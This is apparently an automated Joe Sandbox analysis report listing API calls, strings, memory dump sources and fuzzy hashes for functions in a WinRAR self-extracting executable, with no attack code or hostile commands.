                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5416E75609B82C6EB55AF21E4443AEF7A5EB88B80F984135DE8E43B58DF3CE4018714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31B7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                              • API String ID: 667068680-1718035505
                                                                                                                                                                                                              • Opcode ID: cfcd013ac6127581a6f5b2aa79448a2dfb50b0855d7a86bca1cccd10ee5e69d8
                                                                                                                                                                                                              • Instruction ID: 00045116833e8e851526315764a7b63dfa7607f1ea749f61fe83856cefbbdc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfcd013ac6127581a6f5b2aa79448a2dfb50b0855d7a86bca1cccd10ee5e69d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6110964E9AB83C6EE51BF31A9506F6D2A56F08B80FCC5635C90E06350EE7CE8958264
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9C108: GetVersionExW.KERNEL32 ref: 00007FF75FB9C127
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FA6
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FB2
                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FC2
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FD0
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FDE
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA301F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                              • Opcode ID: 0d8760d0cab82c483e4f6e13a65653f35ae0e4cb21dc7b303c03e9ba6031343a
                                                                                                                                                                                                              • Instruction ID: 45d3e9176f957cfeb76e8dbb8614b1e6bbebe93a4570bcd3e870b797a92f3b4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d8760d0cab82c483e4f6e13a65653f35ae0e4cb21dc7b303c03e9ba6031343a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A44189B2A10692CBDB24DF38D8441ECB7B1F748B887984136EA4D87B58DF38D955C710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                                                                              • String ID: &nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                              • API String ID: 1284135714-864536935
                                                                                                                                                                                                              • Opcode ID: 4800b2c24e7164cdc2d63349d62e6157d8d1c35bedcee7baf7a48d82aa651b38
                                                                                                                                                                                                              • Instruction ID: 311969dd13096d4f5f4267576cf332ea67210d9c4f69b2887f20c965d56c456a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4800b2c24e7164cdc2d63349d62e6157d8d1c35bedcee7baf7a48d82aa651b38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF316355E096C2C2EA61BB61D5501F9E361EF54B84FCC8032DA8D07699EE7CF4828335
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                              • Opcode ID: 6fe600c340fd9802f51f7f0e62a0b889c68c58184e2ffd37e23f4a69c40ca345
                                                                                                                                                                                                              • Instruction ID: 33e71526a2bc401451aa31c7feb1ca4395b1ea52c3c3a590aa01cf21721ba962
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fe600c340fd9802f51f7f0e62a0b889c68c58184e2ffd37e23f4a69c40ca345
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1310776B10692CAEB10DFB5D8401ED73B0FB0CB4C7895126EA4D93A58EF38D894C728
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                              • API String ID: 2889003569-2084237596
                                                                                                                                                                                                              • Opcode ID: 471dcbce960d690d05db94a7ca5e7cf4ad9d191dede20343963ddb5981cb7302
                                                                                                                                                                                                              • Instruction ID: d4e8568e59a03469c40e44c8c094f7dfec4996d5f50b232e8aec7b9607ca992f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471dcbce960d690d05db94a7ca5e7cf4ad9d191dede20343963ddb5981cb7302
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58919F73A08786CAE711AB74E8402EDBBA1FB05788F58412AEA8D47B55DF38D995C700
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                              • API String ID: 2395640692-629598281
                                                                                                                                                                                                              • Opcode ID: f23558f3b55ab5811c05d4f830243c0703e59613b80302f4b97b883ca13d1970
                                                                                                                                                                                                              • Instruction ID: 3f1a5d813c7d45147a3364494312a7dee7ecae95b2afe7fa0d4186cfa66406f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f23558f3b55ab5811c05d4f830243c0703e59613b80302f4b97b883ca13d1970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D51D132B09686C7D754EF25E408AA9B396FB44B84F988130DE0A43B4CDF39EE41C719
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                                                                                              • API String ID: 2638039312-3299779563
                                                                                                                                                                                                              • Opcode ID: 4f8bf267d8144bbe1dfc49916d7516fadadf11eaab2188db66a25276201e4adf
                                                                                                                                                                                                              • Instruction ID: 3d55db5620caf2dc526b18894dfe945d0fc2c5e07272e8d91799f7eda09ffc34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f8bf267d8144bbe1dfc49916d7516fadadf11eaab2188db66a25276201e4adf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29219061A08BC2C7F754AB26A5443BDA3A5AB45FC0F9C8136DA0D03B94CF2DE8468324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                                                                                              • Opcode ID: 003eff63f361b9bace8ab20c22d18a4f05b99d915ab0dda8486e16e47a7a3962
                                                                                                                                                                                                              • Instruction ID: 2fc1faac042f2c421ebf7c4132fc4a0cd63e37ace7ec0c02bc38eb6cb1413e6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 003eff63f361b9bace8ab20c22d18a4f05b99d915ab0dda8486e16e47a7a3962
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E421E364A0DBC7D6FB15AB25B8402F9F3A4BB49784F88443AD94D86224DF7CE445C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              • Opcode ID: 1edc7a242c6f303e79851a22714c11e279823059ed2222e817ff31a8189a1f6b
                                                                                                                                                                                                              • Instruction ID: 71a08ccf37d799f595b69f72883afc51a3d1400a44713f9e0ce0197815c50a83
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1edc7a242c6f303e79851a22714c11e279823059ed2222e817ff31a8189a1f6b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F04F62E19A83C2FE55AF31F4443FAA360AF88B90F8C5435D95F46664DE3CD844C724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                              • Opcode ID: a12116f795de4817994ec8ecb31ecb63e8023060816e07705c80b17cdf8ec1ec
                                                                                                                                                                                                              • Instruction ID: 78b664f58145ec34fa43521cfb8306e49f21307b6792e6926f430458d02ffa45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a12116f795de4817994ec8ecb31ecb63e8023060816e07705c80b17cdf8ec1ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F819D22E28693C5F710BF7598846FEA6A0BB48B98F884135DD4E53695CF3CE6428320
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3659116390-0
                                                                                                                                                                                                              • Opcode ID: 84eb20b548abd459b2a43762cc13bfcb32aeff2f5a3404e642623a6f1e25acbc
                                                                                                                                                                                                              • Instruction ID: e42882b3e341778d207780ee4806ae3a81cbc7adc97bd5697b28bbae782d1306
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84eb20b548abd459b2a43762cc13bfcb32aeff2f5a3404e642623a6f1e25acbc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E518F32A24A92C5E710EF75D8483EEB7B0FB48B98F488135DE4A47699DF38D546C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                              • Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                              • Instruction ID: b1d1b6c9ec8ce3a63bade74e2f07b5a6e32f0a299b3965585509886acfaabe72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111A322F1CA83D1F7543979E446BFB91436F95370F8C8639E97E0A5DACE2DA4444124
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3621893840-0
                                                                                                                                                                                                              • Opcode ID: 2382faf6a70c2a355994166d8c6e85122c42246cf4729fd9ef338276bf00fede
                                                                                                                                                                                                              • Instruction ID: fe4504abd965756abb496a6d7011bcb71faac03e77f82902c1009e12f2f1767c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2382faf6a70c2a355994166d8c6e85122c42246cf4729fd9ef338276bf00fede
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F06261B3848283FB10AB31F855BBAA225EFE4B05FC81030E64E81854DE3CD54ACB20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadStringswprintf
                                                                                                                                                                                                              • String ID: %ls$%s: %s
                                                                                                                                                                                                              • API String ID: 1984293314-2259941744
                                                                                                                                                                                                              • Opcode ID: b51712049b80b3e9528931c18a2633c42c60fd4f9567b8ac4dab9cf633a351a4
                                                                                                                                                                                                              • Instruction ID: 9925f1af3354e59b4d76f86ae878ec071cec5b7602570c09d3ed6e67cab3dca4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51712049b80b3e9528931c18a2633c42c60fd4f9567b8ac4dab9cf633a351a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E812D21E8E5C3C2F66B397DC5682FD85829F81344EDC8336C68F46ED9DD2EA9449231
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __except_validate_context_recordabort
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 746414643-3733052814
                                                                                                                                                                                                              • Opcode ID: 5776aa0e9b111a11ba4543d8f5d6bc7e4cf726ece5945f364da8c139d66e783d
                                                                                                                                                                                                              • Instruction ID: 5364e905efb374045432566fd76d591a1fa54635c52c235759fe1da5b722001f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5776aa0e9b111a11ba4543d8f5d6bc7e4cf726ece5945f364da8c139d66e783d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4071DF326086C2C7DB61AF35D4406BDBBA1EB01B85F988136EE8C47B89CF2CD951C715
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                              • Opcode ID: 1fe992e3b21ed6e277c25637e2d918cc9b498a8db712953a6122dc97eefb4a6e
                                                                                                                                                                                                              • Instruction ID: 1df4688fe5adc67b687059389f1ed628351f07876327c27846b5e6ef128428fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe992e3b21ed6e277c25637e2d918cc9b498a8db712953a6122dc97eefb4a6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C5166B6D0C682CBE774AE3480443BEB7A0EB05B19F9C1135C64A45299CF7DDC83CA29
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$StringType
                                                                                                                                                                                                              • String ID: $%s
                                                                                                                                                                                                              • API String ID: 3586891840-3791308623
                                                                                                                                                                                                              • Opcode ID: dcf1179f887acf3f03fae2aa746e4f8e497bec91aadf3a19f0aaa578cb231d04
                                                                                                                                                                                                              • Instruction ID: b9ac307aa1559b08e320dac59a6a1a026f5ac6da5d8ce5867fd30e13eaeb8788
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcf1179f887acf3f03fae2aa746e4f8e497bec91aadf3a19f0aaa578cb231d04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB414B22B15AC6CAEF60AF35D8006EAA291FB44BA8F8C4635DA1D477D4DF3CE4418360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2466640111-1018135373
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1429681911-3916222277
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                                                                                              • API String ID: 2638039312-3402441367
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                                                                                              • API String ID: 2638039312-3292211884
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: Software\WinRAR SFX
                                                                                                                                                                                                              • API String ID: 3677997916-754673328
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDeviceRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127614599-3916222277
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B5AD
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B602
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B691
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B69F
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
